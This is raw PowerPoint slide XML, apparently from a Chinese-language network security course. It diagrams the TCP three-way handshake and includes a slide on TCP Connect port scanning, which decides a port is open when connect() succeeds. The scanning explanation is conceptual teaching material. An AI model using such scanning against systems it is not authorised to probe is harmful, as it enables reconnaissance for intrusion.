                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>分段</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="2138"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>(seq=300 ack=101 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>ctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>syn,ack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48152" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1393" y="2257"/>
              <a:ext cx="104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a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>SYN received</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48153" name="Group 19"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5328" y="1920"/>
              <a:ext cx="262" cy="287"/>
              <a:chOff x="4730" y="2181"/>
              <a:chExt cx="262" cy="287"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="226324" name="Oval 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4730" y="2191"/>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55" name="Rectangle 21"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4760" y="2181"/>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2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 22"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="409575" y="4054823"/>
            <a:ext cx="5035550" cy="641350"/>
            <a:chOff x="479" y="2571"/>
            <a:chExt cx="3172" cy="404"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48145" name="Rectangle 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="843" y="2571"/>
              <a:ext cx="168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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>Established</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="2138"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>seq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>=101 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>ack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>=301 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>ctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>ack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="226328" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2679" y="2867"/>
              <a:ext cx="972" cy="108"/>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8147" name="Group 25"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="479" y="2609"/>
              <a:ext cx="262" cy="287"/>
              <a:chOff x="302" y="2766"/>
              <a:chExt cx="262" cy="287"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="226330" name="Oval 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="302" y="2776"/>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49" name="Rectangle 27"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="332" y="2766"/>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3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="矩形 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="4837698"/>
            <a:ext cx="8928992" cy="1938992"/>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a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SYN(Synchronize Sequence Numbers)</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SYN=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，连接请求或连接接受报文</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ACK</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Acknowledge</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ACK</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确认号字段才有效</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a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SEQ</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数据太大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(&gt;IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MTU)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>需分段，记录</a:t>
            </a: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报文序号，以便重组。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>随机产生</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1211851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6314"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromLeft)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="226314"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="12" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="226315"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromLeft)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="226315"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold" nodeType="afterGroup">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226307"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="226307"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22630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lide(from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utoUpdateAnimBg="0"/>
      <p:bldP spid="226314" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="3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调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>connect()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>与目标计算机建立连接（完整三次握手）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>connect()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成功：端口处于侦听状态</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>否则，端口关闭</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开放扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47033000-3624-48BD-B70B-41315F6EB578}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="382981" name="Group 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2848619" y="3710136"/>
            <a:ext cx="3836988" cy="911225"/>
            <a:chOff x="1488" y="1776"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382982" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1488" y="1776"/>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3" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1824" y="1920"/>
              <a:ext cx="1906" cy="195"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>SYN （</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>我可以连接吗？）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="382984" name="Group 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2772419" y="4472136"/>
            <a:ext cx="3836988" cy="911225"/>
            <a:chOff x="1440" y="2496"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382985" name="AutoShape 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1440" y="2496"/>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6" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1613" y="2670"/>
              <a:ext cx="2006" cy="196"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>ACK （</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>可以）/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>SYN（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>请确认！）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="382987" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2926407" y="5332561"/>
            <a:ext cx="3836987" cy="911225"/>
            <a:chOff x="1536" y="3264"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382988" name="AutoShape 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1536" y="3264"/>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9" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1790" y="3408"/>
              <a:ext cx="1906" cy="195"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>ACK （</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>确认连接）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382990" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
